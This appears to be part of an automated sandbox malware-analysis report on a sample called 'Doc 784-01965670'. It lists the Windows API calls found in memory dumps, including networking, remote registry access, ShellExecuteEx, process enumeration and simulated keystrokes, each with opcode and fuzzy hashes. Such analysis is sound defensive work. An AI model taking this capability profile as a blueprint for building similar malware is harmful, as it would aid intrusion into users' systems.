• gethostbyname.WSOCK32(?), ref: 00464B29
• _memset.LIBCMT ref: 00464B92
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
• GlobalFree.KERNEL32(00000000), ref: 00464CDE
• WSACleanup.WSOCK32 ref: 00464CE4
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
• String ID:
• API String ID: 3424476444-0
                                                                                                                                    • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                    • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                    • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                    • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                    APIs
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                    • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                    • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                    • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                    • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 535477410-0
                                                                                                                                    • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                    • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                    • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                    • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • _memset.LIBCMT ref: 004538C4
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                    • _wcslen.LIBCMT ref: 00453960
                                                                                                                                    • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3530711334-4108050209
                                                                                                                                    • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                    • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                                    • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                    • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 3488606520-2761332787
                                                                                                                                    • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                    • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                    • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                    • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4082120231-0
                                                                                                                                    • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                    • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                    • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                    • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
• Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
• Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
• Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AngleCloseEllipseFigureLineMovePixelRectangle
• String ID:
• API String ID: 288456094-0
• Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
• Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
• Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
• Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
• Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
• Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
• Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
APIs
• GetParent.USER32(?), ref: 00444BA9
• GetKeyboardState.USER32(?), ref: 00444BBC
• SetKeyboardState.USER32(?), ref: 00444C08
• PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
• PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
• Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
• Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
• Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
• Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
• Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
APIs
• _memset.LIBCMT ref: 00457C34
• _memset.LIBCMT ref: 00457CE8
• ShellExecuteExW.SHELL32(?), ref: 00457D34
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• CloseHandle.KERNEL32(?), ref: 00457DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 1325244542-1426351568
• Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
• Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
• Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
• Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
APIs
• CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
• Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
• __wsplitpath.LIBCMT ref: 004737E1
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscat.LIBCMT ref: 004737F6
• __wcsicoll.LIBCMT ref: 00473818
• Process32NextW.KERNEL32(00000000,?), ref: 00473844
• CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
• Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
• Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
• Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
• ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
• Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
• Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
• Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
• Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• GetMenu.USER32 ref: 004776AA
• GetMenuItemCount.USER32(00000000), ref: 004776CC
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
• _wcslen.LIBCMT ref: 0047771A
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Menu$CountItemStringWindow_wcslen
• String ID:
• API String ID: 1823500076-0
• Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
• Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
• Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
• Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
• SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
